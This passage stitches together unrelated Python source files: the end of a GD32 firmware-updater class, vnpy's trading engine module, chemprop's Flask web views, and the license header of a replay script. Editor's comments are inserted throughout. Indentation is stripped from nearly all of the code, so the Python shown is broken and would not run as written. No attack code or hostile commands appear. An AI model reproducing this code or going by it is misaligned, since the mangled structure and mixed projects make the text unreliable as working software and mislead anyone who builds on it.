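    crc32 = int.from_bytes(body[:4], byteorder='little')
    page_addr = int.from_bytes(body[4:8], byteorder='little')
    rot_scmd, rot_stype = msg["s"] >> 8, msg["s"] & 0xFF
    return rot_scmd, rot_stype, crc32, page_addr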
def get_firmware_data(self, module_id: int, seq_num: int,
bin_data: bytes) -> str:
message = dict()
message["c"] = 0x0B
message["s"] = seq_num
message["d"] = module_id
message["b"] = b64encode(bytes(bin_data)).decode("utf-8")
message["l"] = 8
return json.dumps(message, separators=(",", ":"))
def calc_crc32(self, data: bytes, crc: int) -> int:
crc ^= int.from_bytes(data, byteorder='little', signed=False)
for _ in range(32):
if crc & (1 << 31) != 0:
crc = (crc << 1) ^ 0x4C11DB7
else:
crc <<= 1
crc &= 0xFFFFFFFF
return crc
def calc_crc64(self, data: bytes, checksum: int) -> int:
checksum = self.calc_crc32(data[:4], checksum)
checksum = self.calc_crc32(data[4:], checksum)
return checksum
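# Editor's note: calc_crc32 above is a bitwise, MSB-first CRC-32 with
# polynomial 0x04C11DB7 that consumes one little-endian 32-bit word per call
# and applies no reflection or final XOR (so its output will generally not
# match zlib.crc32). calc_crc64 simply chains it over the two 4-byte halves
# of an 8-byte frame, which is how the per-page checksum is accumulated, e.g.
# (with `updater` a GD32FirmwareUpdater instance):
# checksum = 0
# for offset in range(0, len(page), 8):
#     checksum = updater.calc_crc64(page[offset:offset + 8], checksum)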
def send_firmware_command(self, oper_type: str, module_id: int,
crc_val: int, dest_addr: int,
page_addr: int = 0) -> bool:
rot_scmd = 2 if oper_type == "erase" else 1
# Send firmware command request
request_message = self.get_firmware_command(
module_id, 1, rot_scmd, crc_val, page_addr=dest_addr + page_addr
)
self.__conn.send_nowait(request_message)
return self.receive_command_response()
def receive_command_response(self, response_delay: float = 0.001,
response_timeout: float = 5,
max_response_error_count: int = 75) -> bool:
# Receive firmware command response
response_wait_time = 0
while not self.response_flag:
# Calculate timeout at each iteration
time.sleep(response_delay)
response_wait_time += response_delay
# If timed-out
if response_wait_time > response_timeout:
raise Exception("Response timed-out")
# If error is raised
if self.response_error_flag:
self.response_error_count += 1
if self.response_error_count > max_response_error_count:
raise Exception("Response Errored")
self.response_error_flag = False
return False
self.response_flag = False
return True
def send_firmware_data(self, module_id: int, seq_num: int, bin_data: bytes,
crc_val: int) -> int:
# Send firmware data
data_message = self.get_firmware_data(
module_id, seq_num=seq_num, bin_data=bin_data
)
self.__conn.send_nowait(data_message)
# Calculate crc32 checksum twice
checksum = self.calc_crc64(data=bin_data, checksum=crc_val)
return checksum
def __progress_bar(self, current: int, total: int) -> str:
curr_bar = 50 * current // total
rest_bar = 50 - curr_bar
return f"[{'=' * curr_bar}>{'.' * rest_bar}]"
def __read_conn(self):
while True:
self.__handle_message()
time.sleep(0.001)
if not self.__running:
break
def __handle_message(self):
msg = self.__conn.recv()
if not msg:
return
try:
ins, sid, did, data, length = decode_message(msg)
except json.JSONDecodeError:
return
command = {
0x05: self.__assign_network_id,
0x0A: self.__update_warning,
0x0C: self.__update_firmware_state
}.get(ins)
if command:
command(sid, data)
def __update_firmware_state(self, sid: int, data: str):
message_decoded = unpack_data(data, (4, 1))
stream_state = message_decoded[1]
if stream_state == self.CRC_ERROR:
self.update_response(response=True, is_error_response=True)
elif stream_state == self.CRC_COMPLETE:
self.update_response(response=True)
elif stream_state == self.ERASE_ERROR:
self.update_response(response=True, is_error_response=True)
elif stream_state == self.ERASE_COMPLETE:
self.update_response(response=True)
def __update_warning(self, sid: int, data: str) -> None:
module_uuid = unpack_data(data, (6, 1))[0]
warning_type = unpack_data(data, (6, 1))[1]
# If warning shows current module works fine, return immediately
if not warning_type:
return
module_id = sid
module_type = get_module_type_from_uuid(module_uuid)
if warning_type == 1:
self.check_to_update_firmware(module_id)
elif warning_type == 2:
# Note that more than one warning type 2 message can be received
if self.update_in_progress:
self.add_to_waitlist(module_id, module_type)
else:
self.update_module(module_id, module_type)
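# Editor's note, summarising the update flow implemented above: the updater
# first asks for the network id (0x28 request), then sends UPDATE_FIRMWARE to
# each target. Modules answer with warning messages (0x0A): warning type 1
# triggers check_to_update_firmware, and warning type 2 starts update_module
# (or queues the module via add_to_waitlist if another update is in
# progress). During flashing, the module reports its state via 0x0C messages,
# and the CRC/ERASE COMPLETE or ERROR codes drive receive_command_response
# through update_response.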
|
engine.py
|
"""
"""
import logging
import smtplib
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import CancelRequest, LogData, OrderRequest, SubscribeRequest
from .setting import SETTINGS
from .utility import Singleton, get_folder_path
class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways = {}
self.engines = {}
self.apps = {}
self.init_engines()
def add_engine(self, engine_class: Any):
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
def add_gateway(self, gateway_class: BaseGateway):
"""
Add gateway.
"""
gateway = gateway_class(self.event_engine)
self.gateways[gateway.gateway_name] = gateway
def add_app(self, app_class: BaseApp):
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
self.add_engine(app.engine_class)
def init_engines(self):
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str):
"""
Put log event with specific message.
"""
log = LogData(msg=msg)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def get_gateway(self, gateway_name: str):
"""
Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_log(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str):
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_log(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str):
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
return None
def get_all_gateway_names(self):
"""
Get all names of gateways added to the main engine.
"""
return list(self.gateways.keys())
def get_all_apps(self):
"""
Get all app objects.
"""
return list(self.apps.values())
def connect(self, setting: dict, gateway_name: str):
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.connect(setting)
def subscribe(self, req: SubscribeRequest, gateway_name: str):
"""
Subscribe tick data update of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
def send_order(self, req: OrderRequest, gateway_name: str):
"""
Send new order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str):
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_order(req)
def close(self):
"""
Make sure every gateway and app is closed properly before
the program exits.
"""
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
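# Editor's sketch (illustration only, not part of vnpy): a minimal bootstrap
# of the classes defined in this module. Gateway/app registration is shown
# commented out because the concrete classes live in other packages.
def _demo_main_engine():
    main_engine = MainEngine()      # creates and starts its own EventEngine
    main_engine.write_log("engines initialised")
    # main_engine.add_gateway(SomeGateway)   # any BaseGateway subclass
    # main_engine.connect({...}, "GATEWAY")  # settings dict depends on gateway
    main_engine.close()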
class BaseEngine(ABC):
"""
Abstract class for implementing a function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
__metaclass__ = Singleton
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level = SETTINGS["log.level"]
self.logger = logging.getLogger("VN Trader")
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self):
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self):
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self):
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y%m%d")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
file_handler = logging.FileHandler(
file_path, mode="w", encoding="utf8"
)
file_handler.setLevel(self.level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self):
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event):
"""
Output log event data with logging function.
"""
log = event.data
self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks = {}
self.orders = {}
self.trades = {}
self.positions = {}
self.accounts = {}
self.contracts = {}
self.active_orders = {}
self.add_function()
self.register_event()
def add_function(self):
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_trade = self.get_trade
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
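# Editor's note: add_function exposes the OMS caches by attaching these bound
# methods directly onto main_engine, so application code can call e.g.
# main_engine.get_tick(vt_symbol) or main_engine.get_all_active_orders()
# without holding a reference to the OmsEngine instance.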
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event):
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
def process_order_event(self, event: Event):
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
# Otherwise, pop the inactive order from the dict.
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event):
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event):
""""""
position = event.data
self.positions[position.vt_positionid] = position
def process_account_event(self, event: Event):
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event):
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
def get_tick(self, vt_symbol):
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_order(self, vt_orderid):
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid):
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid):
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid):
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol):
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self):
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self):
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self):
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self):
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self):
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self):
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = ""):
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread = Thread(target=self.run)
self.queue = Queue()
self.active = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = ""):
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = SETTINGS["email.receiver"]
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self):
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self):
""""""
self.active = True
self.thread.start()
def close(self):
""""""
if not self.active:
return
self.active = False
self.thread.join()
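# Editor's note: EmailEngine starts its worker thread lazily on the first
# send_email call and reads its SMTP configuration from SETTINGS
# ("email.server", "email.port", "email.username", "email.password",
# "email.sender", "email.receiver"). Typical use, assuming those settings
# are filled in:
# main_engine.send_email(subject="daily report", content="all positions flat")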
|
views.py
|
"""Defines a number of routes/views for the flask app."""
from functools import wraps
import io
import os
import sys
import shutil
from tempfile import TemporaryDirectory, NamedTemporaryFile
import time
from typing import Callable, List, Tuple
import multiprocessing as mp
import zipfile
from flask import json, jsonify, redirect, render_template, request, send_file, send_from_directory, url_for
import numpy as np
from rdkit import Chem
from werkzeug.utils import secure_filename
from chemprop.web.app import app, db
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from chemprop.args import PredictArgs, TrainArgs
from chemprop.constants import MODEL_FILE_NAME, TRAIN_LOGGER_NAME
from chemprop.data import get_data, get_header, get_smiles, get_task_names, validate_data
from chemprop.train import make_predictions, run_training
from chemprop.utils import create_logger, load_task_names, load_args
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
def check_not_demo(func: Callable) -> Callable:
"""
View wrapper, which will redirect request to site
homepage if app is run in DEMO mode.
:param func: A view which performs sensitive behavior.
:return: A view with behavior adjusted based on DEMO flag.
"""
@wraps(func)
def decorated_function(*args, **kwargs):
if app.config['DEMO']:
return redirect(url_for('home'))
return func(*args, **kwargs)
return decorated_function
def progress_bar(args: TrainArgs, progress: mp.Value):
"""
Updates a progress bar displayed during training.
:param args: Arguments.
:param progress: The current progress.
"""
# Note: there is no code here to handle crashes during model training yet.
current_epoch = -1
while current_epoch < args.epochs - 1:
if os.path.exists(os.path.join(args.save_dir, 'verbose.log')):
with open(os.path.join(args.save_dir, 'verbose.log'), 'r') as f:
content = f.read()
if 'Epoch ' + str(current_epoch + 1) in content:
current_epoch += 1
progress.value = (current_epoch + 1) * 100 / args.epochs
else:
pass
time.sleep(0)
def find_unused_path(path: str) -> str:
"""
Given an initial path, finds an unused path by appending different numbers to the filename.
:param path: An initial path.
:return: An unused path.
"""
if not os.path.exists(path):
return path
base_name, ext = os.path.splitext(path)
i = 2
while os.path.exists(path):
path = base_name + str(i) + ext
i += 1
return path
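# Editor's note (illustration): if "data.csv" and "data2.csv" already exist,
# find_unused_path("data.csv") returns "data3.csv".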
def name_already_exists_message(thing_being_named: str, original_name: str, new_name: str) -> str:
"""
Creates a message about a path already existing and therefore being renamed.
:param thing_being_named: The thing being renamed (ex. Data, Checkpoint).
:param original_name: The original name of the object.
:param new_name: The new name of the object.
:return: A string with a message about the changed name.
"""
return f'{thing_being_named} "{original_name}" already exists. ' \
f'Saving to "{new_name}".'
def get_upload_warnings_errors(upload_item: str) -> Tuple[List[str], List[str]]:
"""
Gets any upload warnings passed along in the request.
:param upload_item: The thing being uploaded (ex. Data, Checkpoint).
:return: A tuple with a list of warning messages and a list of error messages.
"""
warnings_raw = request.args.get(f'{upload_item}_upload_warnings')
errors_raw = request.args.get(f'{upload_item}_upload_errors')
warnings = json.loads(warnings_raw) if warnings_raw is not None else None
errors = json.loads(errors_raw) if errors_raw is not None else None
return warnings, errors
def format_float(value: float, precision: int = 4) -> str:
"""
Formats a float value to a specific precision.
:param value: The float value to format.
:param precision: The number of decimal places to use.
:return: A string containing the formatted float.
"""
return f'{value:.{precision}f}'
def format_float_list(array: List[float], precision: int = 4) -> List[str]:
"""
Formats a list of float values to a specific precision.
:param array: A list of float values to format.
:param precision: The number of decimal places to use.
:return: A list of strings containing the formatted floats.
"""
return [format_float(f, precision) for f in array]
@app.route('/receiver', methods=['POST'])
@check_not_demo
def receiver():
"""Receiver monitoring the progress of training."""
return jsonify(progress=PROGRESS.value, training=TRAINING)
@app.route('/')
def home():
"""Renders the home page."""
return render_template('home.html', users=db.get_all_users())
@app.route('/create_user', methods=['GET', 'POST'])
@check_not_demo
def create_user():
"""
If a POST request is made, creates a new user.
Renders the create_user page.
"""
if request.method == 'GET':
return render_template('create_user.html', users=db.get_all_users())
new_name = request.form['newUserName']
if new_name is not None:
db.insert_user(new_name)
return redirect(url_for('create_user'))
def render_train(**kwargs):
"""Renders the train page with specified kwargs."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('train.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/train', methods=['GET', 'POST'])
@check_not_demo
def train():
"""Renders the train page and performs training if request method is POST."""
global PROGRESS, TRAINING
warnings, errors = [], []
if request.method == 'GET':
return render_train()
# Get arguments
data_name, epochs, ensemble_size, checkpoint_name = \
request.form['dataName'], int(request.form['epochs']), \
int(request.form['ensembleSize']), request.form['checkpointName']
gpu = request.form.get('gpu')
data_path = os.path.join(app.config['DATA_FOLDER'], f'{data_name}.csv')
dataset_type = request.form.get('datasetType', 'regression')
use_progress_bar = request.form.get('useProgressBar', 'True') == 'True'
# Create and modify args
args = TrainArgs().parse_args([
'--data_path', data_path,
'--dataset_type', dataset_type,
'--epochs', str(epochs),
'--ensemble_size', str(ensemble_size),
])
# Get task names
args.task_names = get_task_names(path=data_path, smiles_columns=[None])
# Check if regression/classification selection matches data
data = get_data(path=data_path, smiles_columns=[None])
# Set the number of molecules from the length of smiles_columns for now; an option should be added to the site later.
targets = data.targets()
unique_targets = {target for row in targets for target in row if target is not None}
if dataset_type == 'classification' and len(unique_targets - {0, 1}) > 0:
errors.append('Selected classification dataset but not all labels are 0 or 1. Select regression instead.')
return render_train(warnings=warnings, errors=errors)
if dataset_type == 'regression' and unique_targets <= {0, 1}:
errors.append('Selected regression dataset but all labels are 0 or 1. Select classification instead.')
return render_train(warnings=warnings, errors=errors)
if gpu is not None:
if gpu == 'None':
args.cuda = False
else:
args.gpu = int(gpu)
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt_id, ckpt_name = db.insert_ckpt(checkpoint_name,
current_user,
args.dataset_type,
args.epochs,
args.ensemble_size,
len(targets))
with TemporaryDirectory() as temp_dir:
args.save_dir = temp_dir
if use_progress_bar:
process = mp.Process(target=progress_bar, args=(args, PROGRESS))
process.start()
TRAINING = 1
# Run training
logger = create_logger(name=TRAIN_LOGGER_NAME, save_dir=args.save_dir, quiet=args.quiet)
task_scores = run_training(args, data, logger)[args.metrics[0]]
if use_progress_bar:
process.join()
# Reset globals
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
# Check if name overlap
if checkpoint_name != ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', checkpoint_name, ckpt_name))
# Move models
for root, _, files in os.walk(args.save_dir):
for fname in files:
if fname.endswith('.pt'):
model_id = db.insert_model(ckpt_id)
save_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
shutil.move(os.path.join(args.save_dir, root, fname), save_path)
return render_train(trained=True,
metric=args.metric,
num_tasks=len(args.task_names),
task_names=args.task_names,
task_scores=format_float_list(task_scores),
mean_score=format_float(np.mean(task_scores)),
warnings=warnings,
errors=errors)
def render_predict(**kwargs):
"""Renders the predict page with specified kwargs"""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('predict.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
cuda=app.config['CUDA'],
gpus=app.config['GPUS'],
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users(),
**kwargs)
@app.route('/predict', methods=['GET', 'POST'])
def predict():
"""Renders the predict page and makes predictions if the method is POST."""
if request.method == 'GET':
return render_predict()
# Get arguments
ckpt_id = request.form['checkpointName']
if request.form['textSmiles'] != '':
smiles = request.form['textSmiles'].split()
elif request.form['drawSmiles'] != '':
smiles = [request.form['drawSmiles']]
else:
# Upload data file with SMILES
data = request.files['data']
data_name = secure_filename(data.filename)
data_path = os.path.join(app.config['TEMP_FOLDER'], data_name)
data.save(data_path)
# Check if header is smiles
possible_smiles = get_header(data_path)[0]
smiles = [possible_smiles] if Chem.MolFromSmiles(possible_smiles) is not None else []
# Get remaining smiles
smiles.extend(get_smiles(data_path))
smiles = [[s] for s in smiles]
models = db.get_models(ckpt_id)
model_paths = [os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt') for model in models]
task_names = load_task_names(model_paths[0])
num_tasks = len(task_names)
gpu = request.form.get('gpu')
train_args = load_args(model_paths[0])
# Build arguments
arguments = [
'--test_path', 'None',
'--preds_path', os.path.join(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME']),
'--checkpoint_paths', *model_paths
]
if gpu is not None:
if gpu == 'None':
arguments.append('--no_cuda')
else:
arguments += ['--gpu', gpu]
# Handle additional features
if train_args.features_path is not None:
# TODO: make it possible to specify the features generator if trained using features_path
arguments += [
'--features_generator', 'rdkit_2d_normalized',
'--no_features_scaling'
]
elif train_args.features_generator is not None:
arguments += ['--features_generator', *train_args.features_generator]
if not train_args.features_scaling:
arguments.append('--no_features_scaling')
# Parse arguments
args = PredictArgs().parse_args(arguments)
# Run predictions
preds = make_predictions(args=args, smiles=smiles)
if all(p is None for p in preds):
return render_predict(errors=['All SMILES are invalid'])
# Replace invalid smiles with message
invalid_smiles_warning = 'Invalid SMILES String'
preds = [pred if pred is not None else [invalid_smiles_warning] * num_tasks for pred in preds]
return render_predict(predicted=True,
smiles=smiles,
num_smiles=min(10, len(smiles)),
show_more=max(0, len(smiles)-10),
task_names=task_names,
num_tasks=len(task_names),
preds=preds,
warnings=["List contains invalid SMILES strings"] if None in preds else None,
errors=["No SMILES strings given"] if len(preds) == 0 else None)
@app.route('/download_predictions')
def download_predictions():
"""Downloads predictions as a .csv file."""
return send_from_directory(app.config['TEMP_FOLDER'], app.config['PREDICTIONS_FILENAME'], as_attachment=True, cache_timeout=-1)
@app.route('/data')
@check_not_demo
def data():
"""Renders the data page."""
data_upload_warnings, data_upload_errors = get_upload_warnings_errors('data')
return render_template('data.html',
datasets=db.get_datasets(request.cookies.get('currentUser')),
data_upload_warnings=data_upload_warnings,
data_upload_errors=data_upload_errors,
users=db.get_all_users())
@app.route('/data/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_data(return_page: str):
"""
Uploads a data .csv file.
:param return_page: The name of the page to render to after uploading the dataset.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
dataset = request.files['dataset']
with NamedTemporaryFile() as temp_file:
dataset.save(temp_file.name)
dataset_errors = validate_data(temp_file.name)
if len(dataset_errors) > 0:
errors.extend(dataset_errors)
else:
dataset_name = request.form['datasetName']
# dataset_class = load_args(ckpt).dataset_type # TODO: SWITCH TO ACTUALLY FINDING THE CLASS
dataset_id, new_dataset_name = db.insert_dataset(dataset_name, current_user, 'UNKNOWN')
dataset_path = os.path.join(app.config['DATA_FOLDER'], f'{dataset_id}.csv')
if dataset_name != new_dataset_name:
warnings.append(name_already_exists_message('Data', dataset_name, new_dataset_name))
shutil.copy(temp_file.name, dataset_path)
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, data_upload_warnings=warnings, data_upload_errors=errors))
@app.route('/data/download/<int:dataset>')
@check_not_demo
def download_data(dataset: int):
"""
Downloads a dataset as a .csv file.
:param dataset: The id of the dataset to download.
"""
return send_from_directory(app.config['DATA_FOLDER'], f'{dataset}.csv', as_attachment=True, cache_timeout=-1)
@app.route('/data/delete/<int:dataset>')
@check_not_demo
def delete_data(dataset: int):
"""
Deletes a dataset.
:param dataset: The id of the dataset to delete.
"""
db.delete_dataset(dataset)
os.remove(os.path.join(app.config['DATA_FOLDER'], f'{dataset}.csv'))
return redirect(url_for('data'))
@app.route('/checkpoints')
@check_not_demo
def checkpoints():
"""Renders the checkpoints page."""
checkpoint_upload_warnings, checkpoint_upload_errors = get_upload_warnings_errors('checkpoint')
return render_template('checkpoints.html',
checkpoints=db.get_ckpts(request.cookies.get('currentUser')),
checkpoint_upload_warnings=checkpoint_upload_warnings,
checkpoint_upload_errors=checkpoint_upload_errors,
users=db.get_all_users())
@app.route('/checkpoints/upload/<string:return_page>', methods=['POST'])
@check_not_demo
def upload_checkpoint(return_page: str):
"""
Uploads a checkpoint .pt file.
:param return_page: The name of the page to render after uploading the checkpoint file.
"""
warnings, errors = [], []
current_user = request.cookies.get('currentUser')
if not current_user:
# Use DEFAULT as current user if the client's cookie is not set.
current_user = app.config['DEFAULT_USER_ID']
ckpt = request.files['checkpoint']
ckpt_name = request.form['checkpointName']
ckpt_ext = os.path.splitext(ckpt.filename)[1]
# Collect paths to all uploaded checkpoints (and unzip if necessary)
temp_dir = TemporaryDirectory()
ckpt_paths = []
if ckpt_ext.endswith('.pt'):
ckpt_path = os.path.join(temp_dir.name, MODEL_FILE_NAME)
ckpt.save(ckpt_path)
ckpt_paths = [ckpt_path]
elif ckpt_ext.endswith('.zip'):
ckpt_dir = os.path.join(temp_dir.name, 'models')
zip_path = os.path.join(temp_dir.name, 'models.zip')
ckpt.save(zip_path)
with zipfile.ZipFile(zip_path, mode='r') as z:
z.extractall(ckpt_dir)
for root, _, fnames in os.walk(ckpt_dir):
ckpt_paths += [os.path.join(root, fname) for fname in fnames if fname.endswith('.pt')]
else:
errors.append(f'Uploaded checkpoint(s) file must be either .pt or .zip but got {ckpt_ext}')
# Insert checkpoints into database
if len(ckpt_paths) > 0:
ckpt_args = load_args(ckpt_paths[0])
ckpt_id, new_ckpt_name = db.insert_ckpt(ckpt_name,
current_user,
ckpt_args.dataset_type,
ckpt_args.epochs,
len(ckpt_paths),
ckpt_args.train_data_size)
for ckpt_path in ckpt_paths:
model_id = db.insert_model(ckpt_id)
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model_id}.pt')
if ckpt_name != new_ckpt_name:
warnings.append(name_already_exists_message('Checkpoint', ckpt_name, new_ckpt_name))
shutil.copy(ckpt_path, model_path)
temp_dir.cleanup()
warnings, errors = json.dumps(warnings), json.dumps(errors)
return redirect(url_for(return_page, checkpoint_upload_warnings=warnings, checkpoint_upload_errors=errors))
@app.route('/checkpoints/download/<int:checkpoint>')
@check_not_demo
def download_checkpoint(checkpoint: int):
"""
Downloads a zip of model .pt files.
:param checkpoint: The name of the checkpoint to download.
"""
ckpt = db.query_db(f'SELECT * FROM ckpt WHERE id = {checkpoint}', one=True)
models = db.get_models(checkpoint)
model_data = io.BytesIO()
with zipfile.ZipFile(model_data, mode='w') as z:
for model in models:
model_path = os.path.join(app.config['CHECKPOINT_FOLDER'], f'{model["id"]}.pt')
z.write(model_path, os.path.basename(model_path))
model_data.seek(0)
return send_file(
model_data,
mimetype='application/zip',
as_attachment=True,
attachment_filename=f'{ckpt["ckpt_name"]}.zip',
cache_timeout=-1
)
@app.route('/checkpoints/delete/<int:checkpoint>')
@check_not_demo
def delete_checkpoint(checkpoint: int):
"""
Deletes a checkpoint file.
:param checkpoint: The id of the checkpoint to delete.
"""
db.delete_ckpt(checkpoint)
return redirect(url_for('checkpoints'))
|
replay_actions.py
|
#!/usr/bin/python
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
